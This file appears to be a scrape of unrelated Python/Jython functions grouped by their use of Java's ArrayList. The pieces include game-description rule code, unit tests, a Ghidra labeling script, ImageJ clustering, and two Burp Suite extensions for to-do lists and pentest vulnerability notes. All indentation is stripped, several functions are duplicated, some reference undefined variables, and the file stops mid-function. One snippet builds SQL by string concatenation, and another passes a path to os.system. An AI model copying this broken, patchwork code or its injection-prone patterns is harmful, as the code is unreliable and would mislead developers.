def getAllInstantiations(self):
""" generated source for method getAllInstantiations """
rval = ArrayList()
for gdl in description:
if isinstance(gdl, (GdlRelation, )):
if name == "base":
continue
rval.add(GdlPool.getRule(relation))
for d in domains.values():
for r in d.ruleRefs:
for varInstantiation in varInstantiations:
if varInstantiation.containsValue(None):
raise RuntimeException("Shouldn't instantiate anything to null.")
rval.add(getInstantiation(r.originalRule, varInstantiation))
if rval.get(len(rval) - 1).__str__().contains("null"):
raise RuntimeException("Shouldn't instantiate anything to null: " + rval.get(len(rval) - 1).__str__())
for ruleRef in extraRefs:
for c in ruleRef.conditions:
if c.dom == None:
c.updateDom()
if c.dom != None:
newConditions.add(c)
if len(newConditions) != len(ruleRef.conditions):
ruleRef.conditions = newConditions
for r in extraRefs:
for varInstantiation in varInstantiations:
if varInstantiation.containsValue(None):
raise RuntimeException("Shouldn't instantiate anything to null.")
rval.add(getInstantiation(r.originalRule, varInstantiation))
if rval.get(len(rval) - 1).__str__().contains("null"):
raise RuntimeException("Shouldn't instantiate anything to null.")
if len(varInstantiations) == 0:
rval.add(getInstantiation(r.originalRule, HashMap()))
return rval
def test_number_transform(self):
a = AtomicInteger(0)
b = AtomicInteger(1)
c = AtomicInteger(2)
x = ArrayList()
x.add(a)
x.add(b)
x.add(c)
self.assertEqual(x.get(0).get(), 0)
self.assertEqual(x.get(1).get(), 1)
self.assertEqual(x.get(2).get(), 2)
def test_number_transform(self):
a = AtomicInteger(0)
b = AtomicInteger(1)
c = AtomicInteger(2)
x = ArrayList()
x.add(a)
x.add(b)
x.add(c)
self.assertEqual(x.get(0).get(), 0)
self.assertEqual(x.get(1).get(), 1)
self.assertEqual(x.get(2).get(), 2)
def detectIndirectStringReferences():
listing = currentProgram.getListing()
memory = currentProgram.getMemory()
symbolTable = currentProgram.getSymbolTable()
monitor.setMessage("Labeling Indirect References To Strings")
strAddrSet = ArrayList()
dataIterator = listing.getDefinedData(True)
while (dataIterator.hasNext() and not monitor.isCancelled()):
nextData = dataIterator.next()
strType = nextData.getDataType().getName().lower()
if ("unicode" in strType or "string" in strType):
strAddrSet.add(nextData.getMinAddress())
if (strAddrSet.size() == 0):
popup("No strings found. Try running 'Search -> For Strings...' first.")
return 0;
for i in range(strAddrSet.size()):
strAddr = strAddrSet.get(i)
allRefAddrs = findAllReferences(strAddr, monitor)
for j in range(allRefAddrs.size()):
refFromAddr = allRefAddrs.get(j)
if (listing.getInstructionContaining(refFromAddr) == None): ## if not instruction and has addresses so its pointer
refRef = getReferencesTo(refFromAddr)
if (len(refRef) > 0):
newLabel = "rep_ptr_" + str(listing.getDataAt(strAddr).getLabel()) + "_" + str(allRefAddrs.get(j))
print("[+] " + newLabel)
symbolTable.createLabel(allRefAddrs.get(j), newLabel, USER_DEFINED)
return 0
def test_ArrayList(self):
"""create ArrayList in JVM (from the JavaSet)
"""
arrayList = ArrayList(self.javaList)
# print "created ArrayList:", arrayList, type(arrayList)
self.assertEqual(self.javaList.size(), arrayList.size(),
"ArrayList has same size")
elem0 = arrayList.get(0)
elem1 = arrayList.get(1)
self.assertEqual(0, arrayList.indexOf(elem0), "same index position")
self.assertEqual(1, arrayList.indexOf(elem1), "same index position")
listElem0 = self.testList[0]
listElem1 = self.testList[1]
_type = self._primitive_types.get(elem0.getClass())
if _type is not None:
elem0 = _type.class_.cast(elem0)
elem1 = _type.class_.cast(elem1)
self.assertEqual(elem0, listElem0,
"should be equal: %s (%s) <-> %s (%s)" % (
elem0, type(elem0), listElem0, type(listElem0)))
self.assertEqual(elem1, listElem1,
"should be equal: %s (%s) <-> %s (%s)" % (
elem1, type(elem1), listElem1, type(listElem1)))
self.assertEqual(type(elem0), type(listElem0),
"should have same type: %s <-> %s" % (
type(elem0), type(listElem0)))
self.assertNotEqual(elem0, elem1,
"ArrayList: first element must NOT equal second element")
def core(imp):
pntsA = parsePoints(imp)
# Points must be passed to the Clusterer in Java List of Clusterable.
pntsAL = ArrayList()
for apnt in pntsA:
pntsAL.add(PosWrap(apnt[0], apnt[1], apnt[2]))
awrap = pntsAL.get(0)
pp = awrap.getPoint()
#print pp
clusterer = KMeansPlusPlusClusterer(Number_of_Cluster, Iteration)
res = clusterer.cluster(pntsAL)
outimp = imp.duplicate()
for i in range(res.size()):
if Verbose:
IJ.log('Cluster: ' + str(i))
for apnt in res.get(i).getPoints():
xpos = apnt.getPoint()[0]
ypos = apnt.getPoint()[1]
zpos = apnt.getPoint()[2]
if Verbose:
IJ.log('... ' + str(xpos) + ', ' + str(ypos) + ', ' + str(zpos))
outimp.getStack().getProcessor(int(zpos)+1).putPixel(int(xpos), int(ypos), i+1)
return outimp
def orthoStackFrom4D(imp):
stkA = ArrayList()
for i in range(1, imp.getNFrames()+1):
e4d = Extractfrom4D()
e4d.setGstarttimepoint(i)
IJ.log("current time point" + str(i))
aframe = e4d.coreheadless(imp, 3)
ortho = XYZMaxProject(aframe)
orthoimp = ortho.getXYZProject()
stkA.add(orthoimp)
#orthoimp.show()
stk = ImageStack(stkA.get(0).getWidth(), stkA.get(0).getHeight())
for item in stkA:
stk.addSlice("slcie", item.getProcessor())
out = ImagePlus("out", stk)
return out
def getAffFromRVSTransformPath(path): theList = ArrayList(HashSet()) read = CoordinateTransformXML.parse(path) if type(read) == CoordinateTransformList: read.getList(theList) else: theList.add(read) if theList.size() == 1: # because RVS either stores only one affine or one affine and one translation aff = theList.get(0).createAffine() else: aff = theList.get(0).createAffine() aff1 = theList.get(1).createAffine() aff.preConcatenate(aff1) # option 2 return aff
def createNdarrayFromBuffer(self, buffer):
DirectNDArray = jep.findClass("jep.DirectNDArray")
from java.util import ArrayList
# Start off with a pyjobject which is a DirectNDArray
dndarray = DirectNDArray(buffer)
from java.util import ArrayList
a = ArrayList()
a.add(dndarray)
# Getting the same object from a java method triggers the automatic
# conversion to an ndarray.
return a.get(0)
def createNdarrayFromBuffer(self, buffer):
DirectNDArray = jep.findClass("jep.DirectNDArray")
from java.util import ArrayList
# Start off with a pyjobject which is a DirectNDArray
dndarray = DirectNDArray(buffer)
from java.util import ArrayList
a = ArrayList()
a.add(dndarray)
# Getting the same object from a java method triggers the automatic
# conversion to an ndarray.
return a.get(0)
def execute(self):
#
# set up the db query for grib plugin
#
if self.pluginName == 'grib':
#
# Construct the SQL query to retrieve record IDs from bufrua table
#
gridIdQueryHead = "SELECT DISTINCT id FROM " + self.tableName + " WHERE modelname='"
gridIdQueryTail = "'"
gridIdQuery = gridIdQueryHead + self.gridName + gridIdQueryTail
#
#
# Create an instance of SQL Query and execute it
#
self.sqlGridIDQuery = SqlQueryTask(gridIdQuery)
sqlGridIDQueryResults = self.sqlGridIDQuery.execute()
#
# Retrieve the rows into the ArrayList of grid IDs
#
gridID = ArrayList()
gridID = sqlGridIDQueryResults.getRows()
gridIDList = ArrayList()
for gid in gridID:
strID = "%s" % gid
gridIDList.add(strID[1:-1])
szID = gridIDList.size()
if szID == 0:
return self.makeNullResponse()
singleGridId = gridIDList.get(0)
self.query.setCount(1)
modelInfoId = "%s" % singleGridId
#print "modelInfoId=", modelInfoId
self.query.addParameter("modelInfo.id","%s" % singleGridId)
#
# set up the db query for ncgrib plugin
#
elif self.pluginName == 'ncgrib':
self.query.addParameter("modelInfo.modelName","%s" % self.gridName)
# if (self.eventName != None):
# self.query.addParameter("modelInfo.eventName","%s" % self.eventName)
self.query.setCount(1)
#
# execute the query
#
self.queryResults = self.query.execute()
if self.queryResults is None or self.queryResults.size() == 0:
self.makeNullResponse()
else:
return self.__makeResponse()
def test_ArrayList(self):
"""create ArrayList in JVM (from the JavaSet)
"""
arrayList = ArrayList(self.javaSet)
# print "created ArrayList:", arrayList, type(arrayList)
self.assertEqual(self.javaSet.size(), arrayList.size(),
"ArrayList has same size")
elem0 = arrayList.get(0)
elem1 = arrayList.get(1)
# print "ArrayList: first element: %s (%s) indexOf=%d" % (elem0,type(elem0), arrayList.indexOf(elem0))
# print "ArrayList: second element: %s (%s) indexOf=%d" % (elem1,type(elem1), arrayList.indexOf(elem1))
self.assertFalse(elem0.equals(elem1),
"ArrayList: first element must NOT equal second element")
self.assertNotEqual(elem0, elem1,
"ArrayList: first element must NOT equal second element")
def testGroupLeavesAllDouble(self):
contexts = ArrayList().of_(AtomicReaderContext)
contexts.add(DummyIndexReader.dummyIndexReader(10).getContext())
contexts.add(DummyIndexReader.dummyIndexReader(9).getContext())
contexts.add(DummyIndexReader.dummyIndexReader(8).getContext())
contexts.add(DummyIndexReader.dummyIndexReader(7).getContext())
contexts.add(DummyIndexReader.dummyIndexReader(6).getContext())
contexts.add(DummyIndexReader.dummyIndexReader(5).getContext())
contexts.add(DummyIndexReader.dummyIndexReader(4).getContext())
contexts.add(DummyIndexReader.dummyIndexReader(3).getContext())
contexts.add(DummyIndexReader.dummyIndexReader(2).getContext())
contexts.add(DummyIndexReader.dummyIndexReader(1).getContext())
result = self.sis.group_leaves_test(contexts, 5)
self.assertEquals(5, result.size())
for i in range(5):
context = ArrayList().of_(AtomicReaderContext).cast_(result.get(i))
self.assertEquals(2, context.size())
totalDocs = AtomicReaderContext.cast_(context.get(0)).reader().numDocs() + AtomicReaderContext.cast_(context.get(1)).reader().numDocs()
self.assertEquals(11, totalDocs)
def testPassingDirect(self):
"""
Test that when a numpy ndarray created from a java direct buffer is
passed to java that it still uses the exact same direct buffer. The
simplest way to test that is to copy it back to python and ensure
modifications are visible in both numpy ndarrays
"""
from java.nio import ByteBuffer
buffer = ByteBuffer.allocateDirect(48)
ndarray = self.createNdarrayFromBuffer(buffer)
from java.util import ArrayList
a = ArrayList()
a.add(ndarray)
ndarray2 = a.get(0)
ndarray[0] = 1
self.assertEquals(1, ndarray2[0])
ndarray2[0] = 2
self.assertEquals(2, ndarray[0])
def testPassingDirect(self):
"""
Test that when a numpy ndarray created from a java direct buffer is
passed to java that it still uses the exact same direct buffer. The
simplest way to test that is to copy it back to python and ensure
modifications are visible in both numpy ndarrays
"""
from java.nio import ByteBuffer
buffer = ByteBuffer.allocateDirect(48)
ndarray = self.createNdarrayFromBuffer(buffer)
from java.util import ArrayList
a = ArrayList()
a.add(ndarray)
ndarray2 = a.get(0)
ndarray[0] = 1
self.assertEquals(1, ndarray2[0])
ndarray2[0] = 2
self.assertEquals(2, ndarray[0])
def getAssignmentsWithRecursiveInput(cls, rule, model, form, input, functionInfoMap, completedSentenceFormValues):
""" generated source for method getAssignmentsWithRecursiveInput """
# Look for the literal(s) in the rule with the sentence form of the
# recursive input. This can be tricky if there are multiple matching
# literals.
matchingLiterals = ArrayList()
for literal in rule.getBody():
if isinstance(literal, (GdlSentence, )):
if form.matches(literal):
matchingLiterals.add(literal)
assignmentsList = ArrayList()
for matchingLiteral in matchingLiterals:
# left has the variables, right has the constants
if preassignment != None:
# TODO: This one getVarDomains call is why a lot of
# SentenceModel/DomainModel stuff is required. Can
# this be better factored somehow?
assignmentsList.add(assignments)
if len(assignmentsList) == 0:
return AssignmentsImpl()
if len(assignmentsList) == 1:
return assignmentsList.get(0)
raise RuntimeException("Not yet implemented: assignments for recursive functions with multiple recursive conjuncts")
class BurpExtender(IBurpExtender, ITab, IHttpListener,
IMessageEditorController, AbstractTableModel,
IContextMenuFactory):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# PDB debugging: connect sys.stdout and sys.stderr to Burp
# sys.stdout = callbacks.getStdout()
# sys.stderr = callbacks.getStderr()
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set extension name
callbacks.setExtensionName("To Do")
# create the log and a lock on which to synchronize when adding
# log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
# Configuration Tab
self.initConfigTab()
# table of to do entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# Config tab
self.tabs = JTabbedPane()
self._configuration = self._callbacks.createMessageEditor(self, False)
self.tabs.addTab("Configuration", self._configuration.getComponent())
self._splitpane.setRightComponent(self.panel)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
# initialize tabs
self.initTabs()
# Print thank you, contact info, etc
print("Thank you for installing Burp To Do List")
print("created by Chris Lockard")
print("https://github.com/chrislockard/BurpToDoList")
return
#
# implement ITab
#
def getTabCaption(self):
return "To Do"
def getUiComponent(self):
return self._splitpane
def initConfigTab(self):
# Init configuration tab
self.test = JLabel("Configuration")
self.test.setBounds(10, 10, 140, 30)
self.panel = JPanel()
self.panel.setBounds(0, 0, 1000, 1000)
self.panel.setLayout(None)
self.panel.add(self.test)
def initTabs(self):
# Init ToDo List Tabs
self.logTable = Table(self)
tableWidth = self.logTable.getPreferredSize().width
self.logTable.getColumn("Complete?").setPreferredWidth(
Math.round(tableWidth / 10 * 1))
self.logTable.getColumn("Section").setPreferredWidth(
Math.round(tableWidth / 10 * 3))
self.logTable.getColumn("Task").setPreferredWidth(
Math.round(tableWidth / 10 * 3))
self.logTable.getColumn("Notes").setPreferredWidth(
Math.round(tableWidth / 10 * 3))
self.tableSorter = TableRowSorter(self)
self.logTable.setRowSorter(self.tableSorter)
self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
self._splitpane.setResizeWeight(1)
self.scrollPane = JScrollPane(self.logTable)
self._splitpane.setLeftComponent(self.scrollPane)
self.scrollPane.getVerticalScrollBar().addAdjustmentListener(
autoScrollListener(self))
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 4
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Complete?"
if columnIndex == 1:
return "Section"
if columnIndex == 2:
return "Task"
if columnIndex == 3:
return "Notes"
return ""
def getColumnClass(self, columnIndex):
if columnIndex == 0:
return checkbox
if columnIndex == 1:
return String
if columnIndex == 2:
return String
if columnIndex == 3:
return String
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return self._callbacks.getToolName(logEntry._tool)
if columnIndex == 1:
return logEntry._url.toString()
if columnIndex == 2:
pass
if columnIndex == 3:
pass
return ""
class BurpExtender(IBurpExtender, ITab, IMessageEditorController, AbstractTableModel, IContextMenuFactory):
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("PT Vulnerabilities Manager")
self.config = SafeConfigParser()
self.createSection('projects')
self.createSection('general')
self.config.read('config.ini')
self.chooser = JFileChooser()
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
self.logTable = Table(self)
self.logTable.getColumnModel().getColumn(0).setMaxWidth(35)
self.logTable.getColumnModel().getColumn(1).setMinWidth(100)
self._requestViewer = self._callbacks.createMessageEditor(self, False)
self._responseViewer = self._callbacks.createMessageEditor(self, False)
self.initVulnerabilityTab()
self.initProjSettingsTab()
self.initTabs()
self.initCallbacks()
if self.projPath.getText() != None:
self.loadVulnerabilities(self.projPath.getText())
print "Thank you for installing PT Vulnerabilities Manager v1.0 extension"
print "by Barak Tawily\n\n\n"
print "Disclaimer:\nThis extension might create folders and files in your hardisk which might be declared as sensitive information, make sure you are creating projects under encrypted partition"
return
def initVulnerabilityTab(self):
#
## init vulnerability tab
#
nameLabel = JLabel("Vulnerability Name:")
nameLabel.setBounds(10, 10, 140, 30)
self.addButton = JButton("Add",actionPerformed=self.addVuln)
self.addButton.setBounds(10, 500, 100, 30)
rmVulnButton = JButton("Remove",actionPerformed=self.rmVuln)
rmVulnButton.setBounds(465, 500, 100, 30)
mitigationLabel = JLabel("Mitigation:")
mitigationLabel.setBounds(10, 290, 150, 30)
addSSBtn = JButton("Add SS",actionPerformed=self.addSS)
addSSBtn.setBounds(750, 40, 110, 30)
deleteSSBtn = JButton("Remove SS",actionPerformed=self.removeSS)
deleteSSBtn.setBounds(750, 75, 110, 30)
piclistLabel = JLabel("Images list:")
piclistLabel.setBounds(580, 10, 140, 30)
self.screenshotsList = DefaultListModel()
self.ssList = JList(self.screenshotsList)
self.ssList.setBounds(580, 40, 150, 250)
self.ssList.addListSelectionListener(ssChangedHandler(self))
self.ssList.setBorder(BorderFactory.createLineBorder(Color.GRAY))
previewPicLabel = JLabel("Selected image preview: (click to open in image viewer)")
previewPicLabel.setBounds(580, 290, 500, 30)
copyImgMenu = JMenuItem("Copy")
copyImgMenu.addActionListener(copyImg(self))
self.imgMenu = JPopupMenu("Popup")
self.imgMenu.add(copyImgMenu)
self.firstPic = JLabel()
self.firstPic.setBorder(BorderFactory.createLineBorder(Color.GRAY))
self.firstPic.setBounds(580, 320, 550, 400)
self.firstPic.addMouseListener(imageClicked(self))
self.vulnName = JTextField("")
self.vulnName.getDocument().addDocumentListener(vulnTextChanged(self))
self.vulnName.setBounds(140, 10, 422, 30)
sevirities = ["Unclassified", "Critical","High","Medium","Low"]
self.threatLevel = JComboBox(sevirities);
self.threatLevel.setBounds(140, 45, 140, 30)
colors = ["Color:", "Green", "Red"]
self.colorCombo = JComboBox(colors);
self.colorCombo.setBounds(465, 45, 100, 30)
self.colorCombo
severityLabel = JLabel("Threat Level:")
severityLabel.setBounds(10, 45, 100, 30)
descriptionLabel = JLabel("Description:")
descriptionLabel.setBounds(10, 80, 100, 30)
self.descriptionString = JTextArea("", 5, 30)
self.descriptionString.setWrapStyleWord(True);
self.descriptionString.setLineWrap(True)
self.descriptionString.setBounds(10, 110, 555, 175)
descriptionStringScroll = JScrollPane(self.descriptionString)
descriptionStringScroll.setBounds(10, 110, 555, 175)
descriptionStringScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED)
self.mitigationStr = JTextArea("", 5, 30)
self.mitigationStr.setWrapStyleWord(True);
self.mitigationStr.setLineWrap(True)
self.mitigationStr.setBounds(10, 320, 555, 175)
mitigationStrScroll = JScrollPane(self.mitigationStr)
mitigationStrScroll.setBounds(10, 320, 555, 175)
mitigationStrScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED)
self.pnl = JPanel()
self.pnl.setBounds(0, 0, 1000, 1000);
self.pnl.setLayout(None);
self.pnl.add(addSSBtn)
self.pnl.add(piclistLabel)
self.pnl.add(nameLabel)
self.pnl.add(deleteSSBtn)
self.pnl.add(rmVulnButton)
self.pnl.add(severityLabel)
self.pnl.add(mitigationLabel)
self.pnl.add(descriptionLabel)
self.pnl.add(previewPicLabel)
self.pnl.add(mitigationStrScroll)
self.pnl.add(descriptionStringScroll)
self.pnl.add(self.ssList)
self.pnl.add(self.firstPic)
self.pnl.add(self.addButton)
self.pnl.add(self.vulnName)
self.pnl.add(self.threatLevel)
self.pnl.add(self.colorCombo)
def initProjSettingsTab(self):
# init project settings
projNameLabel = JLabel("Name:")
projNameLabel.setBounds(10, 50, 140, 30)
self.projName = JTextField("")
self.projName.setBounds(140, 50, 320, 30)
self.projName.getDocument().addDocumentListener(projTextChanged(self))
detailsLabel = JLabel("Details:")
detailsLabel.setBounds(10, 120, 140, 30)
reportLabel = JLabel("Generate Report:")
reportLabel.setBounds(10, 375, 140, 30)
types = ["DOCX","HTML","XLSX"]
self.reportType = JComboBox(types)
self.reportType.setBounds(10, 400, 140, 30)
generateReportButton = JButton("Generate", actionPerformed=self.generateReport)
generateReportButton.setBounds(160, 400, 90, 30)
self.projDetails = JTextArea("", 5, 30)
self.projDetails.setWrapStyleWord(True);
self.projDetails.setLineWrap(True)
projDetailsScroll = JScrollPane(self.projDetails)
projDetailsScroll.setBounds(10, 150, 450, 175)
projDetailsScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED)
projPathLabel = JLabel("Path:")
projPathLabel.setBounds(10, 90, 140, 30)
self.projPath = JTextField("")
self.projPath.setBounds(140, 90, 320, 30)
chooseProjPathButton = JButton("Browse...",actionPerformed=self.chooseProjPath)
chooseProjPathButton.setBounds(470, 90, 100, 30)
importProjButton = JButton("Import",actionPerformed=self.importProj)
importProjButton.setBounds(470, 10, 100, 30)
exportProjButton = JButton("Export",actionPerformed=self.exportProj)
exportProjButton.setBounds(575, 10, 100, 30)
openProjButton = JButton("Open Directory",actionPerformed=self.openProj)
openProjButton.setBounds(680, 10, 130, 30)
currentProjectLabel = JLabel("Current:")
currentProjectLabel.setBounds(10, 10, 140, 30)
projects = self.config.options('projects')
self.currentProject = JComboBox(projects)
self.currentProject.addActionListener(projectChangeHandler(self))
self.currentProject.setBounds(140, 10, 140, 30)
self.autoSave = JCheckBox("Auto Save Mode")
self.autoSave.setEnabled(False) # implement this feature
self.autoSave.setBounds(300, 10, 140, 30)
self.autoSave.setToolTipText("Will save any changed value while focus is out")
addProjButton = JButton("Add / Update",actionPerformed=self.addProj)
addProjButton.setBounds(10, 330, 150, 30)
removeProjButton = JButton("Remove Current",actionPerformed=self.rmProj)
removeProjButton.setBounds(315, 330, 146, 30)
generalOptions = self.config.options('general')
if 'default project' in generalOptions:
defaultProj = self.config.get('general','default project')
self.currentProject.getModel().setSelectedItem(defaultProj)
self.projPath.setText(self.config.get('projects',self.currentProject.getSelectedItem()))
self.clearProjTab = True
self.projectSettings = JPanel()
self.projectSettings.setBounds(0, 0, 1000, 1000)
self.projectSettings.setLayout(None)
self.projectSettings.add(reportLabel)
self.projectSettings.add(detailsLabel)
self.projectSettings.add(projPathLabel)
self.projectSettings.add(addProjButton)
self.projectSettings.add(openProjButton)
self.projectSettings.add(projNameLabel)
self.projectSettings.add(projDetailsScroll)
self.projectSettings.add(importProjButton)
self.projectSettings.add(exportProjButton)
self.projectSettings.add(removeProjButton)
self.projectSettings.add(generateReportButton)
self.projectSettings.add(chooseProjPathButton)
self.projectSettings.add(currentProjectLabel)
self.projectSettings.add(self.projPath)
self.projectSettings.add(self.autoSave)
self.projectSettings.add(self.projName)
self.projectSettings.add(self.reportType)
self.projectSettings.add(self.currentProject)
def initTabs(self):
#
## init autorize tabs
#
self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
self.scrollPane = JScrollPane(self.logTable)
self._splitpane.setLeftComponent(self.scrollPane)
colorsMenu = JMenu("Paint")
redMenu = JMenuItem("Red")
noneMenu = JMenuItem("None")
greenMenu = JMenuItem("Green")
redMenu.addActionListener(paintChange(self, "Red"))
noneMenu.addActionListener(paintChange(self, None))
greenMenu.addActionListener(paintChange(self, "Green"))
colorsMenu.add(redMenu)
colorsMenu.add(noneMenu)
colorsMenu.add(greenMenu)
self.menu = JPopupMenu("Popup")
self.menu.add(colorsMenu)
self.tabs = JTabbedPane()
self.tabs.addTab("Request", self._requestViewer.getComponent())
self.tabs.addTab("Response", self._responseViewer.getComponent())
self.tabs.addTab("Vulnerability", self.pnl)
self.tabs.addTab("Project Settings", self.projectSettings)
self.tabs.setSelectedIndex(2)
self._splitpane.setRightComponent(self.tabs)
def initCallbacks(self):
#
## init callbacks
#
# customize our UI components
self._callbacks.customizeUiComponent(self._splitpane)
self._callbacks.customizeUiComponent(self.logTable)
self._callbacks.customizeUiComponent(self.scrollPane)
self._callbacks.customizeUiComponent(self.tabs)
self._callbacks.registerContextMenuFactory(self)
# add the custom tab to Burp's UI
self._callbacks.addSuiteTab(self)
def loadVulnerabilities(self, projPath):
self.clearList(None)
selected = False
for root, dirs, files in os.walk(projPath): # make it go only for dirs
for dirName in dirs:
xmlPath = projPath+"/"+dirName+"/vulnerability.xml"
# xmlPath = xmlPath.replace("/","//")
document = self.getXMLDoc(xmlPath)
nodeList = document.getDocumentElement().getChildNodes()
vulnName = nodeList.item(0).getTextContent()
severity = nodeList.item(1).getTextContent()
description = nodeList.item(2).getTextContent()
mitigation = nodeList.item(3).getTextContent()
color = nodeList.item(4).getTextContent()
test = vulnerability(vulnName,severity,description,mitigation,color)
self._lock.acquire()
row = self._log.size()
self._log.add(test)
self.fireTableRowsInserted(row, row)
self._lock.release()
if vulnName == self.vulnName.getText():
self.logTable.setRowSelectionInterval(row,row)
selected = True
if selected == False and self._log.size() > 0:
self.logTable.setRowSelectionInterval(0, 0)
self.loadVulnerability(self._log.get(0))
def createSection(self, sectioName):
self.config.read('config.ini')
if not (sectioName in self.config.sections()):
self.config.add_section(sectioName)
cfgfile = open("config.ini",'w')
self.config.write(cfgfile)
cfgfile.close()
def saveCfg(self):
f = open('config.ini', 'w')
self.config.write(f)
f.close()
def getXMLDoc(self, xmlPath):
try:
document = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(xmlPath)
return document
except:
self._extender.popup("XML file not found")
return
def saveXMLDoc(self, doc, xmlPath):
transformerFactory = TransformerFactory.newInstance()
transformer = transformerFactory.newTransformer()
source = DOMSource(doc)
result = StreamResult(File(xmlPath))
transformer.transform(source, result)
def generateReport(self,event):
if self.reportType.getSelectedItem() == "HTML":
path = self.reportToHTML()
if self.reportType.getSelectedItem() == "XLSX":
path = self.reportToXLS()
if self.reportType.getSelectedItem() == "DOCX":
path = self.generateReportFromDocxTemplate('template.docx',"newfile.docx", 'word/document.xml')
n = JOptionPane.showConfirmDialog(None, "Report generated successfuly:\n%s\nWould you like to open it?" % (path), "PT Manager", JOptionPane.YES_NO_OPTION)
if n == JOptionPane.YES_OPTION:
os.system('"' + path + '"') # Bug! stucking burp until the file get closed
def exportProj(self,event):
self.chooser.setDialogTitle("Save project")
Ffilter = FileNameExtensionFilter("Zip files", ["zip"])
self.chooser.setFileFilter(Ffilter)
returnVal = self.chooser.showSaveDialog(None)
if returnVal == JFileChooser.APPROVE_OPTION:
dst = str(self.chooser.getSelectedFile())
shutil.make_archive(dst,"zip",self.getCurrentProjPath())
self.popup("Project export successfuly")
def importProj(self,event):
self.chooser.setDialogTitle("Select project zip to directory")
Ffilter = FileNameExtensionFilter("Zip files", ["zip"])
self.chooser.setFileFilter(Ffilter)
returnVal = self.chooser.showOpenDialog(None)
if returnVal == JFileChooser.APPROVE_OPTION:
zipPath = str(self.chooser.getSelectedFile())
self.chooser.setDialogTitle("Select project directory")
self.chooser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY)
returnVal = self.chooser.showOpenDialog(None)
if returnVal == JFileChooser.APPROVE_OPTION:
projPath = str(self.chooser.getSelectedFile()) + "/PTManager"
with zipfile.ZipFile(zipPath, "r") as z:
z.extractall(projPath)
xmlPath = projPath + "/project.xml"
document = self.getXMLDoc(xmlPath)
nodeList = document.getDocumentElement().getChildNodes()
projName = nodeList.item(0).getTextContent()
nodeList.item(1).setTextContent(projPath)
self.saveXMLDoc(document, xmlPath)
self.config.set('projects', projName, projPath)
self.saveCfg()
self.reloadProjects()
self.currentProject.getModel().setSelectedItem(projName)
self.clearVulnerabilityTab()
def reportToXLS(self):
if not xlsxwriterImported:
self.popup("xlsxwriter library is not imported")
return
workbook = xlsxwriter.Workbook(self.getCurrentProjPath() + '/PT Manager Report.xlsx')
worksheet = workbook.add_worksheet()
bold = workbook.add_format({'bold': True})
worksheet.write(0, 0, "Vulnerability Name", bold)
worksheet.write(0, 1, "Threat Level", bold)
worksheet.write(0, 2, "Description", bold)
worksheet.write(0, 3, "Mitigation", bold)
row = 1
for i in range(0,self._log.size()):
worksheet.write(row, 0, self._log.get(i).getName())
worksheet.write(row, 1, self._log.get(i).getSeverity())
worksheet.write(row, 2, self._log.get(i).getDescription())
worksheet.write(row, 3, self._log.get(i).getMitigation())
row = row + 1
# add requests and images as well
workbook.close()
return self.getCurrentProjPath() + '/PT Manager Report.xlsx'
def reportToHTML(self):
htmlContent = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="he" dir="ltr">
<head>
<title>PT Manager Report</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<style>
body {
background-repeat: no-repeat;
background-attachment: fixed;
font-family: Arial,Tahoma,sens-serif;
font-size: 13px;
margin: auto;
}
#warpcenter {
width: 900px;
margin: 0px auto;
}
table {
border: 2px dashed #000000;
}
td {
border-top: 2px dashed #000000;
padding: 10px;
}
img {
border: 0px;
}
</style>
<script language="javascript">
function divHideShow(divToHideOrShow)
{
var div = document.getElementById(divToHideOrShow);
if (div.style.display == "block")
{
div.style.display = "none";
}
else
{
div.style.display = "block";
}
}
</script>
</head>
<body>
<div id="warpcenter">
<h1> PT Manager Report </h1>
<h2> Project: %s</h1>
""" % (self.projName.getText())
for i in range(0,self._log.size()):
name = self._log.get(i).getName()
request = "None"
response = "None"
path = self.getVulnReqResPath("request",name)
if os.path.exists(path):
request = self.newlineToBR(self.getFileContent(path))
path = self.getVulnReqResPath("response",name)
if os.path.exists(path):
response = self.newlineToBR(self.getFileContent(path))
images = ""
for fileName in os.listdir(self.projPath.getText()+"/"+self.clearStr(name)):
if fileName.endswith(".jpg"):
images += "%s<br><img src=\"%s\"><br><br>" % (fileName, self.projPath.getText()+"/"+self.clearStr(name) + "/" + fileName)
description = self.newlineToBR(self._log.get(i).getDescription())
mitigation = self.newlineToBR(self._log.get(i).getMitigation())
htmlContent += self.convertVulntoTable(i,name,self._log.get(i).getSeverity(), description,mitigation, request, response, images)
htmlContent += "</div></body></html>"
f = open(self.getCurrentProjPath() + '/PT Manager Report.html', 'w')
f.writelines(htmlContent)
f.close()
return self.getCurrentProjPath() + '/PT Manager Report.html'
def newlineToBR(self,string):
return "<br />".join(string.split("\n"))
def getFileContent(self,path):
